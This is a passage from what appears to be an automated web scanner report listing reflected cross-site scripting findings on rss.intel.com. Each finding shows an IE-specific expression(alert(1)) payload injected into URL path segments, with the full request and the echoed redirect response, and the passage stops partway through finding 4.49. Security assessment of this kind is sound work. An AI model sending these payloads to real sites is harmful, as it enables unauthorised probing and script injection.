4.36. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a was submitted in the REST URL parameter 2. This input was echoed as 1c387"style="x:expression(alert(1))"2f6f6c3797a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-2641381c387"style%3d"x%3aexpression(alert(1))"2f6f6c3797a/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-2641381c387"style="x:expression(alert(1))"2f6f6c3797a">
...[SNIP]...

4.37. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834 was submitted in the REST URL parameter 3. This input was echoed as 1d31a"style="x:expression(alert(1))"60bb2fac834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com1d31a"style%3d"x%3aexpression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard
Content-Length: 219
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com1d31a"style="x:expression(alert(1))"60bb2fac834/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard">
...[SNIP]...

4.38. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac was submitted in the REST URL parameter 4. This input was echoed as 65b1a"style="x:expression(alert(1))"b8c17ee6eac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community65b1a"style%3d"x%3aexpression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community65b1a"style="x:expression(alert(1))"b8c17ee6eac/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.39. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69694"style%3d"x%3aexpression(alert(1))"cb56d7389f was submitted in the REST URL parameter 5. This input was echoed as 69694"style="x:expression(alert(1))"cb56d7389f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom69694"style%3d"x%3aexpression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:13 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 243
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom69694"style="x:expression(alert(1))"cb56d7389f/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.40. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12c9"style%3d"x%3aexpression(alert(1))"c871cd23475 was submitted in the REST URL parameter 6. This input was echoed as c12c9"style="x:expression(alert(1))"c871cd23475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blogc12c9"style%3d"x%3aexpression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc12c9"style="x:expression(alert(1))"c871cd23475/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.41. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 7]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8552d"style%3d"x%3aexpression(alert(1))"1e321e64d44 was submitted in the REST URL parameter 7. This input was echoed as 8552d"style="x:expression(alert(1))"1e321e64d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/20118552d"style%3d"x%3aexpression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:23 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/20118552d"style="x:expression(alert(1))"1e321e64d44/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.42. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 8]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e56d"style%3d"x%3aexpression(alert(1))"ea92235af50 was submitted in the REST URL parameter 8. This input was echoed as 8e56d"style="x:expression(alert(1))"ea92235af50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style%3d"x%3aexpression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:27 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/028e56d"style="x:expression(alert(1))"ea92235af50/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.43. http://rss.intel.com/click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard [REST URL parameter 9]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb was submitted in the REST URL parameter 9. This input was echoed as fafef"style="x:expression(alert(1))"e2545db63fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264138/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style%3d"x%3aexpression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:33 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138
Content-Length: 244
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01fafef"style="x:expression(alert(1))"e2545db63fb/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard?cid=rss-182178-c1-264138">
...[SNIP]...

4.44. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 was submitted in the REST URL parameter 10. This input was echoed as eb668"style="x:expression(alert(1))"6213d7b7402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style%3d"x%3aexpression(alert(1))"6213d7b7402 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:37 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radioeb668"style="x:expression(alert(1))"6213d7b7402?cid=rss-182178-c1-264171">
...[SNIP]...

4.45. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70 was submitted in the REST URL parameter 2. This input was echoed as 9eca7"style="x:expression(alert(1))"a9ac5ac8d70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-2641719eca7"style%3d"x%3aexpression(alert(1))"a9ac5ac8d70/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:21:59 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-2641719eca7"style="x:expression(alert(1))"a9ac5ac8d70">
...[SNIP]...

4.46. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb04"style%3d"x%3aexpression(alert(1))"01502404417 was submitted in the REST URL parameter 3. This input was echoed as bbb04"style="x:expression(alert(1))"01502404417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.combbb04"style%3d"x%3aexpression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:04 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio
Content-Length: 209
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.combbb04"style="x:expression(alert(1))"01502404417/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio">
...[SNIP]...

4.47. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc was submitted in the REST URL parameter 4. This input was echoed as 5111a"style="x:expression(alert(1))"83dfca4f7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community5111a"style%3d"x%3aexpression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:09 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community5111a"style="x:expression(alert(1))"83dfca4f7dc/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.48. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4 was submitted in the REST URL parameter 5. This input was echoed as d438a"style="x:expression(alert(1))"543ef26b9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroomd438a"style%3d"x%3aexpression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:13 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171
Content-Length: 234
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomd438a"style="x:expression(alert(1))"543ef26b9c4/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio?cid=rss-182178-c1-264171">
...[SNIP]...

4.49. http://rss.intel.com/click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264171/newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1b4"style%3d"x%3aexpression(alert(1))"65332bacd22 was submitted in the REST URL parameter 6. This input was echoed as 6e1b4"style="x:expression(alert(1))"65332bacd22 in the application's response.

